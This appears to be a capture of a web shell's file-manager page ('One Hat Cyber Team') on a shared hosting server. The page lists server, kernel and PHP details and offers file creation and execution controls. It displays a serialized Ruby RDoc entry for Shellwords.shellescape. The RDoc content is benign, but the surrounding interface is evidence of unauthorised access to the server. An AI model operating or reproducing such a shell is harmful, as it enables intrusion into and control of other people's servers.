⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.116
Server IP:
78.40.11.138
Server:
Linux tango.o2switch.net 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
alt
/
ruby19
/
share
/
ri
/
1.9.1
/
system
/
Shellwords
/
View File Name :
shellescape-c.ri
U:RDoc::AnyMethod[iI"shellescape:EFI"Shellwords::shellescape;FT:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"EEscapes a string so that it can be safely used in a Bourne shell;TI"command line.;To:RDoc::Markup::BlankLine o; ; [I"CNote that a resulted string should be used unquoted and is not;TI"<intended for use in double quotes nor in single quotes.;T@o:RDoc::Markup::Verbatim; [I"@open("| grep #{Shellwords.escape(pattern)} file") { |pipe| ;FI" # ... ;FI"} ;Fo; ; [I"9String#shellescape is a shorthand for this function.;T@o;; [I"9open("| grep #{pattern.shellescape} file") { |pipe| ;FI" # ... ;FI"} ;Fo; ; [ I"DIt is caller's responsibility to encode the string in the right;TI"Bencoding for the shell environment where this string is used.;TI"BMultibyte characters are treated as multibyte characters, not;TI"bytes.;T: @file000[[I"escape;Fo;; [ ; 0I" (str);TI"lib/shellwords.rb;T